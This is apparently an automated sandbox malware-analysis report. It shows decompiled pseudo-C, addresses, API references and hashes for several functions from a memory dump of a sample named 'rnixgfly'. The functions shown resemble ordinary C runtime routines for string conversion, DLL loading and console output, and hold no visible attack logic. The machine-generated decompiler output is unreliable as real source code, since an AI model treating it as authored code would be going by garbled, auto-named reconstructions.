                      				intOrPtr* _t95;
                      				signed int _t96;
                      				void* _t97;
                      				intOrPtr* _t98;
                      				intOrPtr* _t100;
                      				void* _t103;
                      
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t40 =  *0x415010; // 0xb1ab4d46
                      				_v8 = _t40 ^ _t96;
                      				_t89 = _a20;
                      				if(_t89 > 0) {
                      					_t69 = E0040AE45(_a16, _t89);
                      					_t103 = _t69 - _t89;
                      					_t4 = _t69 + 1; // 0x1
                      					_t89 = _t4;
                      					if(_t103 >= 0) {
                      						_t89 = _t69;
                      					}
                      				}
                      				_t71 = _a32;
                      				if(_a32 == 0) {
                      					_t71 =  *((intOrPtr*)( *_a4 + 8));
                      					_a32 =  *((intOrPtr*)( *_a4 + 8));
                      				}
                      				_t45 = E004073AA(_t71, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t89, 0, 0);
                      				_t98 = _t97 + 0x18;
                      				_v12 = _t45;
                      				if(_t45 == 0) {
                      					L38:
                      					_pop(_t90);
                      					_pop(_t94);
                      					_pop(_t72);
                      					return E004018D4(_t45, _t72, _v8 ^ _t96, 0x400, _t90, _t94);
                      				} else {
                      					_t16 = _t45 + _t45 + 8; // 0x8
                      					asm("sbb eax, eax");
                      					_t48 = _t45 + _t45 & _t16;
                      					if(_t48 == 0) {
                      						_t95 = 0;
                      						L36:
                      						_t73 = 0;
                      						L37:
                      						E00407EE5(_t95);
                      						_t45 = _t73;
                      						goto L38;
                      					}
                      					if(_t48 > 0x400) {
                      						_t95 = E00407D48(_t48);
                      						if(_t95 == 0) {
                      							goto L36;
                      						}
                      						 *_t95 = 0xdddd;
                      						L12:
                      						if(_t95 == 0) {
                      							goto L36;
                      						}
                      						_t51 = E004073AA(_t71, 1, _a16, _t89, _t95, _v12);
                      						_t100 = _t98 + 0x18;
                      						if(_t51 == 0) {
                      							goto L36;
                      						}
                      						_t91 = _v12;
                      						_t73 = E004085AD(_a8, _a12, _t95, _v12, 0, 0, 0, 0, 0);
                      						if(_t73 == 0) {
                      							goto L36;
                      						}
                      						if((_a12 & 0x00000400) == 0) {
                      							_t30 = _t73 + _t73 + 8; // 0x8
                      							asm("sbb eax, eax");
                      							_t55 = _t73 + _t73 & _t30;
                      							if(_t55 == 0) {
                      								_t92 = 0;
                      								L34:
                      								E00407EE5(_t92);
                      								goto L36;
                      							}
                      							if(_t55 > 0x400) {
                      								_t92 = E00407D48(_t55);
                      								if(_t92 == 0) {
                      									goto L34;
                      								}
                      								 *_t92 = 0xdddd;
                      								L26:
                      								_t92 = _t92 + 8;
                      								if(_t92 == 0 || E004085AD(_a8, _a12, _t95, _v12, _t92, _t73, 0, 0, 0) == 0) {
                      									goto L34;
                      								} else {
                      									_push(0);
                      									_push(0);
                      									if(_a28 != 0) {
                      										_push(_a28);
                      										_push(_a24);
                      									} else {
                      										_push(0);
                      										_push(0);
                      									}
                      									_push(_t73);
                      									_push(_t92);
                      									_push(0);
                      									_push(_a32);
                      									_t73 = E00407464();
                      									if(_t73 == 0) {
                      										goto L34;
                      									} else {
                      										E00407EE5(_t92);
                      										goto L37;
                      									}
                      								}
                      							}
                      							E004018F0(_t55);
                      							_t92 = _t100;
                      							if(_t92 == 0) {
                      								goto L34;
                      							}
                      							 *_t92 = 0xcccc;
                      							goto L26;
                      						}
                      						_t64 = _a28;
                      						if(_t64 == 0) {
                      							goto L37;
                      						}
                      						if(_t73 > _t64) {
                      							goto L36;
                      						}
                      						_t73 = E004085AD(_a8, _a12, _t95, _t91, _a24, _t64, 0, 0, 0);
                      						if(_t73 != 0) {
                      							goto L37;
                      						}
                      						goto L36;
                      					}
                      					E004018F0(_t48);
                      					_t95 = _t98;
                      					if(_t95 == 0) {
                      						goto L36;
                      					}
                      					 *_t95 = 0xcccc;
                      					goto L12;
                      				}
                      			}




























                      0x00409ac5
                      0x00409ac6
                      0x00409ac7
                      0x00409ace
                      0x00409ad4
                      0x00409ad9
                      0x00409adf
                      0x00409ae5
                      0x00409ae8
                      0x00409ae8
                      0x00409aeb
                      0x00409aed
                      0x00409aed
                      0x00409aeb
                      0x00409aef
                      0x00409af4
                      0x00409afb
                      0x00409afe
                      0x00409afe
                      0x00409b1a
                      0x00409b1f
                      0x00409b22
                      0x00409b27
                      0x00409c9d
                      0x00409ca0
                      0x00409ca1
                      0x00409ca2
                      0x00409cae
                      0x00409b2d
                      0x00409b2f
                      0x00409b34
                      0x00409b36
                      0x00409b38
                      0x00409c90
                      0x00409c92
                      0x00409c92
                      0x00409c94
                      0x00409c95
                      0x00409c9b
                      0x00000000
                      0x00409c9b
                      0x00409b43
                      0x00409b62
                      0x00409b67
                      0x00000000
                      0x00000000
                      0x00409b6d
                      0x00409b73
                      0x00409b78
                      0x00000000
                      0x00000000
                      0x00409b89
                      0x00409b8e
                      0x00409b93
                      0x00000000
                      0x00000000
                      0x00409b99
                      0x00409bb0
                      0x00409bb4
                      0x00000000
                      0x00000000
                      0x00409bc2
                      0x00409bff
                      0x00409c04
                      0x00409c06
                      0x00409c08
                      0x00409c85
                      0x00409c87
                      0x00409c88
                      0x00000000
                      0x00409c8d
                      0x00409c0c
                      0x00409c27
                      0x00409c2c
                      0x00000000
                      0x00000000
                      0x00409c2e
                      0x00409c34
                      0x00409c34
                      0x00409c39
                      0x00000000
                      0x00409c55
                      0x00409c57
                      0x00409c58
                      0x00409c5c
                      0x00409c7d
                      0x00409c80
                      0x00409c5e
                      0x00409c5e
                      0x00409c5f
                      0x00409c5f
                      0x00409c60
                      0x00409c61
                      0x00409c62
                      0x00409c63
                      0x00409c6b
                      0x00409c72
                      0x00000000
                      0x00409c74
                      0x00409c75
                      0x00000000
                      0x00409c7a
                      0x00409c72
                      0x00409c39
                      0x00409c0e
                      0x00409c13
                      0x00409c17
                      0x00000000
                      0x00000000
                      0x00409c19
                      0x00000000
                      0x00409c19
                      0x00409bc4
                      0x00409bc9
                      0x00000000
                      0x00000000
                      0x00409bd1
                      0x00000000
                      0x00000000
                      0x00409bed
                      0x00409bf1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00409bf7
                      0x00409b45
                      0x00409b4a
                      0x00409b4e
                      0x00000000
                      0x00000000
                      0x00409b54
                      0x00000000
                      0x00409b54

                      APIs
                      • __alloca_probe_16.LIBCMT ref: 00409B45
                      • __alloca_probe_16.LIBCMT ref: 00409C0E
                      • __freea.LIBCMT ref: 00409C75
                        • Part of subcall function 00407D48: RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                      • __freea.LIBCMT ref: 00409C88
                      • __freea.LIBCMT ref: 00409C95
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                      • String ID:
                      • API String ID: 1423051803-0
                      • Opcode ID: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                      • Instruction ID: f5d5e5908dbe2b0eece80851408d63fed06286bdfdf7f28fe4aa87bf0313151d
                      • Opcode Fuzzy Hash: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                      • Instruction Fuzzy Hash: C351A172A042066FFB209F65CC85EBB36E9EF84714F15453EFC04B6292E638DC109669
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402BE3(WCHAR* _a4) {
                      				struct HINSTANCE__* _t4;
                      
                      				_t4 = LoadLibraryExW(_a4, 0, 0x800);
                      				if(_t4 != 0) {
                      					return _t4;
                      				} else {
                      					if(GetLastError() != 0x57 || E00405A18(_a4, L"api-ms-", 7) == 0) {
                      						return 0;
                      					}
                      					return LoadLibraryExW(_a4, 0, 0);
                      				}
                      			}




                      0x00402bf0
                      0x00402bf8
                      0x00402c2d
                      0x00402bfa
                      0x00402c03
                      0x00000000
                      0x00402c2a
                      0x00402c29
                      0x00402c29

                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx), ref: 00402BF0
                      • GetLastError.KERNEL32(?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx,00000000,?,00402AB7), ref: 00402BFA
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402C22
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID: api-ms-
                      • API String ID: 3177248105-2084034818
                      • Opcode ID: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                      • Instruction ID: e589de4d7b83ec3a89ad76cef1a63b0294eee27024da7e6f7d3f22e711884464
                      • Opcode Fuzzy Hash: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                      • Instruction Fuzzy Hash: 2CE01230644204B6FB111B62EE0AB1E3A54AB10B55F104831F90DB41E1EBF69964899C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E00409F8D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
                      				char _v16;
                      				signed int _v20;
                      				char _v28;
                      				char _v35;
                      				signed char _v36;
                      				void _v44;
                      				signed char* _v48;
                      				char _v49;
                      				long _v56;
                      				long _v60;
                      				intOrPtr _v64;
                      				struct _OVERLAPPED* _v68;
                      				signed int _v72;
                      				signed char* _v76;
                      				signed int _v80;
                      				signed int _v84;
                      				intOrPtr _v88;
                      				void _v92;
                      				long _v96;
                      				signed char* _v100;
                      				void* _v104;
                      				char _v108;
                      				int _v112;
                      				intOrPtr _v116;
                      				struct _OVERLAPPED* _v120;
                      				struct _OVERLAPPED* _v124;
                      				struct _OVERLAPPED* _v128;
                      				struct _OVERLAPPED* _v132;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t174;
                      				signed int _t175;
                      				signed int _t177;
                      				int _t183;
                      				signed char* _t186;
                      				signed int _t190;
                      				signed char _t191;
                      				intOrPtr _t194;
                      				void* _t196;
                      				long _t197;
                      				long _t201;
                      				signed char* _t207;
                      				void _t209;
                      				signed char* _t214;
                      				void* _t221;
                      				char _t224;
                      				char* _t228;
                      				void* _t237;
                      				long _t243;
                      				signed int _t244;
                      				signed char* _t245;
                      				void* _t255;
                      				intOrPtr _t261;
                      				void* _t262;
                      				struct _OVERLAPPED* _t263;
                      				intOrPtr* _t264;
                      				signed int _t265;
                      				intOrPtr _t266;
                      				signed int _t271;
                      				struct _OVERLAPPED* _t274;
                      				signed int _t276;
                      				signed char _t281;
                      				signed int _t285;
                      				signed char* _t286;
                      				struct _OVERLAPPED* _t289;
                      				void* _t292;
                      				signed int _t293;
                      				signed int _t295;
                      				struct _OVERLAPPED* _t296;
                      				signed char* _t298;
                      				intOrPtr* _t299;
                      				void* _t300;
                      				signed int _t301;
                      				long _t302;
                      				signed int _t304;
                      				signed int _t305;
                      				void* _t306;
                      				void* _t307;
                      				void* _t308;
                      
                      				_push(0xffffffff);
                      				_push(0x40d469);
                      				_push( *[fs:0x0]);
                      				_t307 = _t306 - 0x74;
                      				_t174 =  *0x415010; // 0xb1ab4d46
                      				_t175 = _t174 ^ _t305;
                      				_v20 = _t175;
                      				_push(_t175);
                      				 *[fs:0x0] =  &_v16;
                      				_t177 = _a8;
                      				_t298 = _a12;
                      				_t261 = _a20;
                      				_t265 = (_t177 & 0x0000003f) * 0x38;
                      				_t285 = _t177 >> 6;
                      				_v100 = _t298;
                      				_v64 = _t261;
                      				_v72 = _t285;
                      				_v84 = _t265;
                      				_v104 =  *((intOrPtr*)(_t265 +  *((intOrPtr*)(0x4160f8 + _t285 * 4)) + 0x18));
                      				_v88 = _a16 + _t298;
                      				_t183 = GetConsoleOutputCP();
                      				_t309 =  *((char*)(_t261 + 0x14));
                      				_v112 = _t183;
                      				if( *((char*)(_t261 + 0x14)) == 0) {
                      					E00405940(_t261, _t285, _t309);
                      				}
                      				_t299 = _a4;
                      				_t266 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0xc)) + 8));
                      				asm("stosd");
                      				_v116 = _t266;
                      				asm("stosd");
                      				asm("stosd");
                      				_t186 = _v100;
                      				_t286 = _t186;
                      				_v48 = _t286;
                      				if(_t186 < _v88) {
                      					_t293 = _v84;
                      					_t263 = 0;
                      					_v76 = 0;
                      					while(1) {
                      						_v49 =  *_t286;
                      						_t190 = _v72;
                      						_v68 = _t263;
                      						_v56 = 1;
                      						if(_t266 != 0xfde9) {
                      							goto L22;
                      						}
                      						_t274 = _t263;
                      						_t228 =  *(0x4160f8 + _t190 * 4) + 0x2e + _t293;
                      						_v76 = _t228;
                      						while( *_t228 != 0) {
                      							_t274 =  &(_t274->Internal);
                      							_t228 = _t228 + 1;
                      							if(_t274 < 5) {
                      								continue;
                      							}
                      							break;
                      						}
                      						_t295 = _v88 - _t286;
                      						_v56 = _t274;
                      						if(_t274 <= 0) {
                      							_t276 =  *((char*)(( *_t286 & 0x000000ff) + 0x415778)) + 1;
                      							_v80 = _t276;
                      							__eflags = _t276 - _t295;
                      							if(_t276 > _t295) {
                      								__eflags = _t295;
                      								if(_t295 <= 0) {
                      									goto L44;
                      								} else {
                      									_t301 = _v84;
                      									do {
                      										 *((char*)( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t301 + _t263 + 0x2e)) =  *((intOrPtr*)(_t263 + _t286));
                      										_t263 =  &(_t263->Internal);
                      										__eflags = _t263 - _t295;
                      									} while (_t263 < _t295);
                      									goto L43;
                      								}
                      								L52:
                      							} else {
                      								_v132 = _t263;
                      								__eflags = _t276 - 4;
                      								_v128 = _t263;
                      								_v60 = _t286;
                      								_v56 = (_t276 == 4) + 1;
                      								_t237 = E0040AD3D( &_v132,  &_v68,  &_v60, (_t276 == 4) + 1,  &_v132, _v64);
                      								_t308 = _t307 + 0x14;
                      								__eflags = _t237 - 0xffffffff;
                      								if(_t237 != 0xffffffff) {
                      									_t293 = _v84;
                      									goto L21;
                      								}
                      							}
                      						} else {
                      							_t243 =  *((char*)(( *_v76 & 0x000000ff) + 0x415778)) + 1;
                      							_v60 = _t243;
                      							_t244 = _t243 - _t274;
                      							_v80 = _t244;
                      							if(_t244 > _t295) {
                      								__eflags = _t295;
                      								if(_t295 > 0) {
                      									_t245 = _v48;
                      									_t302 = _v56;
                      									do {
                      										_t281 =  *((intOrPtr*)(_t263 + _t245));
                      										_t286 =  *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _v84 + _t263;
                      										_t263 =  &(_t263->Internal);
                      										_t286[_t302 + 0x2e] = _t281;
                      										__eflags = _t263 - _t295;
                      									} while (_t263 < _t295);
                      									L43:
                      									_t299 = _a4;
                      								}
                      								L44:
                      								 *(_t299 + 4) =  &(( *(_t299 + 4))[_t295]);
                      							} else {
                      								_t296 = _t263;
                      								_t264 = _v76;
                      								do {
                      									 *((char*)(_t305 + _t296 - 0x18)) =  *_t264;
                      									_t296 =  &(_t296->Internal);
                      									_t264 = _t264 + 1;
                      								} while (_t296 < _t274);
                      								_t303 = _v80;
                      								_t263 = 0;
                      								if(_v80 > 0) {
                      									E00403120( &_v28 + _t274, _t286, _t303);
                      									_t274 = _v56;
                      									_t307 = _t307 + 0xc;
                      								}
                      								_t293 = _v84;
                      								_t289 = _t263;
                      								_t304 = _v72;
                      								do {
                      									 *( *((intOrPtr*)(0x4160f8 + _t304 * 4)) + _t293 + _t289 + 0x2e) = _t263;
                      									_t289 =  &(_t289->Internal);
                      								} while (_t289 < _t274);
                      								_t299 = _a4;
                      								_v108 =  &_v28;
                      								_v124 = _t263;
                      								_v120 = _t263;
                      								_v56 = (_v60 == 4) + 1;
                      								_t255 = E0040AD3D( &_v124,  &_v68,  &_v108, (_v60 == 4) + 1,  &_v124, _v64);
                      								_t308 = _t307 + 0x14;
                      								if(_t255 != 0xffffffff) {
                      									L21:
                      									_t197 =  &(_v48[_v80]) - 1;
                      									L31:
                      									_v48 = _t197 + 1;
                      									_t201 = E00407464(_v112, _t263,  &_v68, _v56,  &_v44, 5, _t263, _t263);
                      									_t307 = _t308 + 0x20;
                      									_v60 = _t201;
                      									if(_t201 != 0) {
                      										if(WriteFile(_v104,  &_v44, _t201,  &_v96, _t263) == 0) {
                      											L50:
                      											 *_t299 = GetLastError();
                      										} else {
                      											_t286 = _v48;
                      											_t207 =  *((intOrPtr*)(_t299 + 8)) - _v100 + _t286;
                      											_v76 = _t207;
                      											 *(_t299 + 4) = _t207;
                      											if(_v96 >= _v60) {
                      												if(_v49 != 0xa) {
                      													L38:
                      													if(_t286 < _v88) {
                      														_t266 = _v116;
                      														continue;
                      													}
                      												} else {
                      													_t209 = 0xd;
                      													_v92 = _t209;
                      													if(WriteFile(_v104,  &_v92, 1,  &_v96, _t263) == 0) {
                      														goto L50;
                      													} else {
                      														if(_v96 >= 1) {
                      															 *((intOrPtr*)(_t299 + 8)) =  *((intOrPtr*)(_t299 + 8)) + 1;
                      															 *(_t299 + 4) =  &(( *(_t299 + 4))[1]);
                      															_t286 = _v48;
                      															_v76 =  *(_t299 + 4);
                      															goto L38;
                      														}
                      													}
                      												}
                      											}
                      										}
                      									}
                      								}
                      							}
                      						}
                      						goto L51;
                      						L22:
                      						_t271 =  *(0x4160f8 + _t190 * 4);
                      						_v80 = _t271;
                      						_t191 =  *((intOrPtr*)(_t271 + _t293 + 0x2d));
                      						__eflags = _t191 & 0x00000004;
                      						if((_t191 & 0x00000004) == 0) {
                      							_t271 =  *_t286 & 0x000000ff;
                      							_t194 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
                      							__eflags =  *((intOrPtr*)(_t194 + _t271 * 2)) - _t263;
                      							if( *((intOrPtr*)(_t194 + _t271 * 2)) >= _t263) {
                      								_push(_v64);
                      								_push(1);
                      								_push(_t286);
                      								goto L29;
                      							} else {
                      								_t214 =  &(_t286[1]);
                      								_v60 = _t214;
                      								__eflags = _t214 - _v88;
                      								if(_t214 >= _v88) {
                      									 *((char*)(_v80 + _t293 + 0x2e)) =  *_t286;
                      									 *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) =  *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) | 0x00000004;
                      									 *(_t299 + 4) =  &(_v76[1]);
                      								} else {
                      									_t221 = E0040942F(_t271, _t286,  &_v68, _t286, 2, _v64);
                      									_t308 = _t307 + 0x10;
                      									__eflags = _t221 - 0xffffffff;
                      									if(_t221 != 0xffffffff) {
                      										_t197 = _v60;
                      										goto L31;
                      									}
                      								}
                      							}
                      						} else {
                      							_push(_v64);
                      							_v36 =  *(_t271 + _t293 + 0x2e) & 0x000000fb;
                      							_t224 =  *_t286;
                      							_v35 = _t224;
                      							 *((char*)(_t271 + _t293 + 0x2d)) = _t224;
                      							_push(2);
                      							_push( &_v36);
                      							L29:
                      							_push( &_v68);
                      							_t196 = E0040942F(_t271, _t286);
                      							_t308 = _t307 + 0x10;
                      							__eflags = _t196 - 0xffffffff;
                      							if(_t196 != 0xffffffff) {
                      								_t197 = _v48;
                      								goto L31;
                      							}
                      						}
                      						goto L51;
                      					}
                      				}
                      				L51:
                      				 *[fs:0x0] = _v16;
                      				_pop(_t292);
                      				_pop(_t300);
                      				_pop(_t262);
                      				__eflags = _v20 ^ _t305;
                      				return E004018D4(_t299, _t262, _v20 ^ _t305, _t286, _t292, _t300);
                      				goto L52;
                      			}



















































































                      0x00409f92
                      0x00409f94
                      0x00409f9f
                      0x00409fa0
                      0x00409fa3
                      0x00409fa8
                      0x00409faa
                      0x00409fb0
                      0x00409fb4
                      0x00409fba
                      0x00409fbf
                      0x00409fc5
                      0x00409fc8
                      0x00409fcb
                      0x00409fce
                      0x00409fd1
                      0x00409fd4
                      0x00409fde
                      0x00409fe5
                      0x00409fed
                      0x00409ff0
                      0x00409ff6
                      0x00409ffa
                      0x00409ffd
                      0x0040a001
                      0x0040a001
                      0x0040a009
                      0x0040a00e
                      0x0040a013
                      0x0040a014
                      0x0040a017
                      0x0040a018
                      0x0040a019
                      0x0040a01c
                      0x0040a01e
                      0x0040a024
                      0x0040a02a
                      0x0040a02d
                      0x0040a02f
                      0x0040a032
                      0x0040a034
                      0x0040a037
                      0x0040a03a
                      0x0040a03d
                      0x0040a04a
                      0x00000000
                      0x00000000
                      0x0040a057
                      0x0040a05c
                      0x0040a05e
                      0x0040a061
                      0x0040a066
                      0x0040a067
                      0x0040a06b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040a06b
                      0x0040a070
                      0x0040a072
                      0x0040a077
                      0x0040a12b
                      0x0040a12c
                      0x0040a12f
                      0x0040a131
                      0x0040a2e9
                      0x0040a2eb
                      0x00000000
                      0x0040a2ed
                      0x0040a2ed
                      0x0040a2f0
                      0x0040a2ff
                      0x0040a303
                      0x0040a304
                      0x0040a304
                      0x00000000
                      0x0040a308
                      0x00000000
                      0x0040a137
                      0x0040a13c
                      0x0040a13f
                      0x0040a142
                      0x0040a148
                      0x0040a151
                      0x0040a15c
                      0x0040a161
                      0x0040a164
                      0x0040a167
                      0x0040a16d
                      0x00000000
                      0x0040a16d
                      0x0040a167
                      0x0040a07d
                      0x0040a08a
                      0x0040a08b
                      0x0040a08e
                      0x0040a090
                      0x0040a095
                      0x0040a2bc
                      0x0040a2be
                      0x0040a2c0
                      0x0040a2c3
                      0x0040a2c6
                      0x0040a2d3
                      0x0040a2d6
                      0x0040a2d8
                      0x0040a2d9
                      0x0040a2dd
                      0x0040a2dd
                      0x0040a2e1
                      0x0040a2e1
                      0x0040a2e1
                      0x0040a2e4
                      0x0040a2e4
                      0x0040a09b
                      0x0040a09b
                      0x0040a09d
                      0x0040a0a0
                      0x0040a0a2
                      0x0040a0a6
                      0x0040a0a7
                      0x0040a0a8
                      0x0040a0ac
                      0x0040a0af
                      0x0040a0b3
                      0x0040a0bd
                      0x0040a0c2
                      0x0040a0c5
                      0x0040a0c5
                      0x0040a0c8
                      0x0040a0cb
                      0x0040a0cd
                      0x0040a0d0
                      0x0040a0d9
                      0x0040a0dd
                      0x0040a0de
                      0x0040a0e5
                      0x0040a0eb
                      0x0040a0f3
                      0x0040a0fe
                      0x0040a103
                      0x0040a10e
                      0x0040a113
                      0x0040a119
                      0x0040a170
                      0x0040a176
                      0x0040a20b
                      0x0040a210
                      0x0040a222
                      0x0040a227
                      0x0040a22a
                      0x0040a22f
                      0x0040a24a
                      0x0040a32b
                      0x0040a331
                      0x0040a250
                      0x0040a256
                      0x0040a259
                      0x0040a25b
                      0x0040a25e
                      0x0040a267
                      0x0040a271
                      0x0040a2af
                      0x0040a2b2
                      0x0040a2b4
                      0x00000000
                      0x0040a2b4
                      0x0040a273
                      0x0040a275
                      0x0040a277
                      0x0040a290
                      0x00000000
                      0x0040a296
                      0x0040a29a
                      0x0040a2a0
                      0x0040a2a3
                      0x0040a2a9
                      0x0040a2ac
                      0x00000000
                      0x0040a2ac
                      0x0040a29a
                      0x0040a290
                      0x0040a271
                      0x0040a267
                      0x0040a24a
                      0x0040a22f
                      0x0040a119
                      0x0040a095
                      0x00000000
                      0x0040a17c
                      0x0040a17c
                      0x0040a183
                      0x0040a186
                      0x0040a18a
                      0x0040a18d
                      0x0040a1b0
                      0x0040a1b6
                      0x0040a1b8
                      0x0040a1bc
                      0x0040a1ed
                      0x0040a1f0
                      0x0040a1f2
                      0x00000000
                      0x0040a1be
                      0x0040a1be
                      0x0040a1c1
                      0x0040a1c4
                      0x0040a1c7
                      0x0040a30f
                      0x0040a31d
                      0x0040a326
                      0x0040a1cd
                      0x0040a1d7
                      0x0040a1dc
                      0x0040a1df
                      0x0040a1e2
                      0x0040a1e8
                      0x00000000
                      0x0040a1e8
                      0x0040a1e2
                      0x0040a1c7
                      0x0040a18f
                      0x0040a196
                      0x0040a199
                      0x0040a19c
                      0x0040a19e
                      0x0040a1a1
                      0x0040a1a8
                      0x0040a1aa
                      0x0040a1f3
                      0x0040a1f6
                      0x0040a1f7
                      0x0040a1fc
                      0x0040a1ff
                      0x0040a202
                      0x0040a208
                      0x00000000
                      0x0040a208
                      0x0040a202
                      0x00000000
                      0x0040a18d
                      0x0040a032
                      0x0040a333
                      0x0040a338
                      0x0040a340
                      0x0040a341
                      0x0040a342
                      0x0040a346
                      0x0040a34e
                      0x00000000

                      APIs
                      • GetConsoleOutputCP.KERNEL32(B1AB4D46,00000000,00000000,00000008), ref: 00409FF0
                        • Part of subcall function 00407464: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00409C6B,?,00000000,-00000008), ref: 004074C5
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040A242
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040A288
                      • GetLastError.KERNEL32 ref: 0040A32B
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                      • Instruction ID: 286eb15663e9a8c4fe1ad12a89817a662dc5e0061b0541279607a600132331f4
                      • Opcode Fuzzy Hash: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                      • Instruction Fuzzy Hash: 47D18BB5D042589FCB14CFA8C8809EDBBB4FF08304F14817AE866FB391D634A956CB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 66%
                      			E00403694(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                      				signed int* _t52;
                      				signed int _t53;
                      				intOrPtr _t54;
                      				signed int _t58;
                      				signed int _t61;
                      				intOrPtr _t71;
                      				signed int _t75;
                      				signed int _t79;
                      				signed int _t81;
                      				signed int _t84;
                      				signed int _t85;
                      				signed int _t97;
                      				signed int* _t98;
                      				signed char* _t101;
                      				signed int _t107;
                      				void* _t111;
                      
                      				_push(0x10);
                      				_push(0x413518);
                      				E00401EE0(__ebx, __edi, __esi);
                      				_t75 = 0;
                      				_t52 =  *(_t111 + 0x10);
                      				_t81 = _t52[1];
                      				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                      					L30:
                      					_t53 = 0;
                      					__eflags = 0;
                      					goto L31;
                      				} else {
                      					_t97 = _t52[2];
                      					if(_t97 != 0 ||  *_t52 < 0) {
                      						_t84 =  *_t52;
                      						_t107 =  *(_t111 + 0xc);
                      						if(_t84 >= 0) {
                      							_t107 = _t107 + 0xc + _t97;
                      						}
                      						 *(_t111 - 4) = _t75;
                      						_t101 =  *(_t111 + 0x14);
                      						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
                      							L10:
                      							_t54 =  *((intOrPtr*)(_t111 + 8));
                      							__eflags = _t84 & 0x00000008;
                      							if((_t84 & 0x00000008) == 0) {
                      								__eflags =  *_t101 & 0x00000001;
                      								if(( *_t101 & 0x00000001) == 0) {
                      									_t84 =  *(_t54 + 0x18);
                      									__eflags = _t101[0x18] - _t75;
                      									if(_t101[0x18] != _t75) {
                      										__eflags = _t84;
                      										if(_t84 == 0) {
                      											goto L32;
                      										} else {
                      											__eflags = _t107;
                      											if(_t107 == 0) {
                      												goto L32;
                      											} else {
                      												__eflags =  *_t101 & 0x00000004;
                      												_t79 = 0;
                      												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
                      												__eflags = _t75;
                      												 *(_t111 - 0x20) = _t75;
                      												goto L29;
                      											}
                      										}
                      									} else {
                      										__eflags = _t84;
                      										if(_t84 == 0) {
                      											goto L32;
                      										} else {
                      											__eflags = _t107;
                      											if(_t107 == 0) {
                      												goto L32;
                      											} else {
                      												E00403120(_t107, E00402768(_t84,  &(_t101[8])), _t101[0x14]);
                      												goto L29;
                      											}
                      										}
                      									}
                      								} else {
                      									__eflags =  *(_t54 + 0x18);
                      									if( *(_t54 + 0x18) == 0) {
                      										goto L32;
                      									} else {
                      										__eflags = _t107;
                      										if(_t107 == 0) {
                      											goto L32;
                      										} else {
                      											E00403120(_t107,  *(_t54 + 0x18), _t101[0x14]);
                      											__eflags = _t101[0x14] - 4;
                      											if(_t101[0x14] == 4) {
                      												__eflags =  *_t107;
                      												if( *_t107 != 0) {
                      													_push( &(_t101[8]));
                      													_push( *_t107);
                      													goto L21;
                      												}
                      											}
                      											goto L29;
                      										}
                      									}
                      								}
                      							} else {
                      								_t84 =  *(_t54 + 0x18);
                      								goto L12;
                      							}
                      						} else {
                      							_t71 =  *0x415c6c; // 0x0
                      							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
                      							if(_t71 == 0) {
                      								goto L10;
                      							} else {
                      								 *0x40e160();
                      								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
                      								L12:
